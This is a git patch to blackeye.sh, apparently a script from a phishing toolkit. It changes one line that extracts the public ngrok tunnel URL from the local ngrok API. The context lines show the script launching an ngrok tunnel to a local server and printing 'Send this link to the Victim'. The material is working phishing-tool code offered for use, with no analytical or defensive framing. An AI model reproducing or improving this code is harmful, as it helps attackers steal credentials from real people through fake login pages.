From bbe2c5d1070414bfa4c5c6e0a6bd82f1f3e50ebd Mon Sep 17 00:00:00 2001 From: mathavamoorthi <152806651+mathavamoorthi@users.noreply.github.com> Date: Fri, 26 Jul 2024 23:48:00 +0530 Subject: [PATCH] Update blackeye.sh --- blackeye.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/blackeye.sh b/blackeye.sh index 50b1eec..527166a 100755 --- a/blackeye.sh +++ b/blackeye.sh @@ -433,7 +433,7 @@ printf "\e[1;92m[\e[0m*\e[1;92m] Starting ngrok server...\n" ./ngrok http 3333 > /dev/null 2>&1 & sleep 10 -link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io") +link=$( curl -S -n http://127.0.0.1:4040/api/tunnels | grep -oE "https:\/\/[a-z0-9\-]*\.ngrok\.io") printf "\e[1;92m[\e[0m*\e[1;92m] Send this link to the Victim:\e[0m\e[1;77m %s\e[0m\n" $link checkfound }